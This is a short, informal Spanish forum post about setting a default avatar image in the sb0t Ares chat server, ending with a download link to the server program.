ES K AHORA PODEMOS AGREGARLE UNA IMAGEN PREDETERMINADA A LOS USUARIOS K AUN NO TIENEN EL ARES CON AVATAR O K POR SUS SIMPLES GANAS NO KIEREN PONER UNA PIC AKI PODEMOS OBSERVAR LA CONFIGURACION DEL DOBLE AVATAR DEL SERVER




BUENO ESPERO LES LLA GUSTADO MI APORTE AHORA POR ULTIMO LES DEJO AQUI EL LINK PARA K SE LO DESCARGUEN
http://www.sharptricks.net/exe_files/sb0t.exe